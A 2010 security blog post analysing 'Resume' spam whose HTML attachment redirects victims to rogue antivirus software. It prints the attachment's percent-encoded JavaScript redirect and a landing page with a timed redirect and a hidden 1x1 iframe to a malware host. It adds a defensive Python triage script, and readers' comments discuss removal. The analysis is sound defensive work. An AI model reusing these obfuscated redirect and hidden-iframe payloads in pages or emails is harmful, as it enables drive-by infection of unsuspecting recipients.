Resume emails with attached file Resume.html leads to rogue AV software
August 19, 2010 5 Comments
MX Lab intercepts emails with the subject Resume, an attached file Resume.html and a very short email body:
Attached, please find
The attached HTML file contains the following code:
<SCRIPT LANGUAGE="Javascript"><!--//
function xhtmldecode(x){document.write(unescape(x))}
function runit(){x="%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%
3D%22%72%65%66%72%65%73%68%22%20%63%6F%6E%74%65%6E%74%3D%
22%30%3B%75%72%6C%3D%68%74%74%70%3A%2F%2F%77%69%6D%62%65%
72%74%2E%6E%6C%2F%78%2E%68%74%6D%6C%22%3E%0D%0A"
xhtmldecode(x)}
runit()
//--></script>
When opening the attached HTML file you are directed to a web site with the following code:
PLEASE WAITING 4 SECOND... <meta http-equiv="refresh" content="4; url=hxxp://brocuphdislock.cz.cc/scanner10/?afid=24"> </head><body> <iframe src="hxxp://cherrysolo.ru:8080/index.php?pid=10" style="visibility: hidden;" height="1" width="1"></iframe>
</body></html>
After 4 seconds you will get redirected to hxxp://brocuphdislock.cz.cc/scanner10/?afid=24. On our Mac computer we got the following screen.

It stayed like this for quite a while so I guess that the scripting of this site doesn’t work too well on a Mac computer. At MX Lab, we believe that this is a new campaign to distribute the rogue antivirus software antivirus_24.exe as mentioned in earlier blog articles:
Campaign with emails that lead to rogue AV software antivirus_24.exe continues
Malicious emails lead to rogue AV software antivirus_24.exe
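One way to triage an attachment like the one above without opening it in a browser, added here as an example (it is not MX Lab's code): the script decodes the unescape() payload statically, then reports meta-refresh targets and hidden iframes, defanged the way this post writes URLs. The sample markup, the example.test hosts and all function names are constructed for this example.

```python
import re
from urllib.parse import unquote

ESCAPED_RUN = re.compile(r"(?:%u[0-9A-Fa-f]{4}|%[0-9A-Fa-f]{2}){8,}")
META_REFRESH = re.compile(
    r"<meta[^>]*http-equiv\s*=\s*[\"']?refresh[\"']?[^>]*"
    r"content\s*=\s*[\"']\s*(\d+)\s*;\s*url\s*=\s*([^\"'>\s]+)", re.I)
IFRAME = re.compile(r"<iframe\b[^>]*>", re.I)
SRC = re.compile(r"src\s*=\s*[\"']?([^\"'>\s]+)", re.I)
HIDDEN = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none|"
                    r"(?:width|height)\s*=\s*[\"']?[01][\"'\s>]", re.I)

def js_unescape(run):
    """Decode like JavaScript unescape() without executing any script."""
    run = re.sub(r"%u([0-9A-Fa-f]{4})", lambda m: chr(int(m.group(1), 16)), run)
    return unquote(run, encoding="latin-1")

def decode_layers(markup, max_depth=5):
    """Return the markup plus each layer hidden in percent-escaped runs."""
    layers, frontier = [markup], [markup]
    for _ in range(max_depth):  # bounded, so nested encodings cannot loop forever
        frontier = [js_unescape(run) for text in frontier
                    for run in ESCAPED_RUN.findall(text)]
        layers.extend(frontier)
    return layers

def defang(url):  # hxxp, as in the post, so reported URLs are not clickable
    return re.sub(r"^http", "hxxp", url, flags=re.I)

def triage(markup):
    """Report meta-refresh redirects and hidden iframes found in any layer."""
    found = {"redirects": [], "hidden_iframes": []}
    for layer in decode_layers(markup):
        for delay, url in META_REFRESH.findall(layer):
            found["redirects"].append((int(delay), defang(url)))
        for tag in IFRAME.findall(layer):
            src = SRC.search(tag)
            if src and HIDDEN.search(tag):
                found["hidden_iframes"].append(defang(src.group(1)))
    return found

# Constructed samples shaped like the post's two stages; hosts are placeholders.
STAGE1 = '<meta http-equiv="refresh" content="0;url=http://redirect.example.test/x.html">\r\n'
ATTACHMENT = ('<SCRIPT LANGUAGE="Javascript">function d(x){document.write(unescape(x))}d("'
              + "".join("%%%02X" % ord(c) for c in STAGE1) + '")</script>')
LANDING = ('<meta http-equiv="refresh" content="4; url=http://landing.example.test/scan/?id=1">'
           '<iframe src="http://kit.example.test:8080/index.php?pid=1" '
           'style="visibility: hidden;" height="1" width="1"></iframe>')
```

Calling `triage(ATTACHMENT)` surfaces the zero-delay redirect that is invisible in the raw file, and `triage(LANDING)` flags both the delayed redirect and the 1x1 hidden iframe.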

How do you remove this? We had several people open this file yesterday. Malwarebytes does not detect it.
Get in contact with Malwarebytes and try to give them a sample of the malware. Perhaps they can update their software with a procedure to remove the malware. Or post your problems on the forum of Malwarebytes. In some cases you can get in touch with an expert in virus removals.
You could also try Spybot S&D or Ad-Aware from Lavasoft. The links are on the right side in the Security Tools section.
Search with the help of Google for manual removal instructions.
My recommendation is: back up your data at relevant times and, in case of a virus infection, re-install your system. There is always a chance that ‘something’ stays behind. I never trust a computer once it got an infection.
We keep getting resume’ attachments in .html format. They all have the same text and weird email addresses. I am glad they came in all of a sudden as I am afraid to open any attachments now.
Here’s a very good link that provides screenshots for all fake antiviruses:
http://tusharvartak.com